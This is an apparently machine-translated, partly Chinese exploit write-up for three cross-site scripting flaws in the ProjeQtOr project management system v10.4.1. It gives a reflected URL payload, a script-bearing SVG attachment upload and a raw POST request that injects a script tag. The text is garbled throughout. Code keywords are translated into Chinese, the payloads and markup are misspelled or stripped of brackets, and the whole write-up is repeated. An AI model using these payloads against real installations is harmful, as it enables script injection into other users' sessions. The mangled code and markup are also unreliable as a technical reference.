利用标题:项目管理系统v10.4.1-多个XSS
版本: V10.4.1
BUGS:多个XSS
Technology: php
供应商url: https://www.projeqtor.org
软件link: https://sourceforge.net/projects/projectorria/files/projeqtorv10.4.4.1.zip/download
发现日期: 09.07.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
### XSS-1 ###
访问: http://localhost/projeqtor/view/ref...pt%3C/script%3C/script%3C/script%3ecsrftoken=
PAYLOAD: MIRI%27);%22%3E%3cscript%3eAlett(4)%3C/脚本/脚本%3E
### XSS-2 ###
步骤:
1。登录帐户
2。去项目并创建项目
3.添加附件
3。上传SVG文件
'''
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
'''
4。转到svg文件(http://localhost/projeqtor/files/action/actactment/actactment_5/malas.svg)
### XSS-3 ###
转到下面的地址(发布请求)
POST /projeqtor/tool/ack.php?destinationWidth=50destinationHeight=0isIE=xhrPostDestination=resultDivMainxhrPostIsResultMessage=truexhrPostValidationType=attachmentxhrPostTimestamp=1688898776311csrfToken=HTTP/1.1
HOST: LOCALHOST
内容长度: 35
SEC-CH-UA:
content-type:应用程序/x-www-form-urlenceded
X-重新要求- WITH: XMLHTTPREQUEST
sec-ch-ua-mobile:0
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform:''
ACCEPT: /
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/projeqtor/view/main.php
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: phpsessid=r5cjcsggl4j0oa9s70vchaklf3
连接:关闭
resultack=scriptalert(4)/脚本
版本: V10.4.1
BUGS:多个XSS
Technology: php
供应商url: https://www.projeqtor.org
软件link: https://sourceforge.net/projects/projectorria/files/projeqtorv10.4.4.1.zip/download
发现日期: 09.07.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
### XSS-1 ###
访问: http://localhost/projeqtor/view/ref...pt%3C/script%3C/script%3C/script%3ecsrftoken=
PAYLOAD: MIRI%27);%22%3E%3cscript%3eAlett(4)%3C/脚本/脚本%3E
### XSS-2 ###
步骤:
1。登录帐户
2。去项目并创建项目
3.添加附件
3。上传SVG文件
'''
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.location);
/脚本
/svg
'''
4。转到svg文件(http://localhost/projeqtor/files/action/actactment/actactment_5/malas.svg)
### XSS-3 ###
转到下面的地址(发布请求)
POST /projeqtor/tool/ack.php?destinationWidth=50destinationHeight=0isIE=xhrPostDestination=resultDivMainxhrPostIsResultMessage=truexhrPostValidationType=attachmentxhrPostTimestamp=1688898776311csrfToken=HTTP/1.1
HOST: LOCALHOST
内容长度: 35
SEC-CH-UA:
content-type:应用程序/x-www-form-urlenceded
X-重新要求- WITH: XMLHTTPREQUEST
sec-ch-ua-mobile:0
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform:''
ACCEPT: /
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/projeqtor/view/main.php
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: phpsessid=r5cjcsggl4j0oa9s70vchaklf3
连接:关闭
resultack=scriptalert(4)/脚本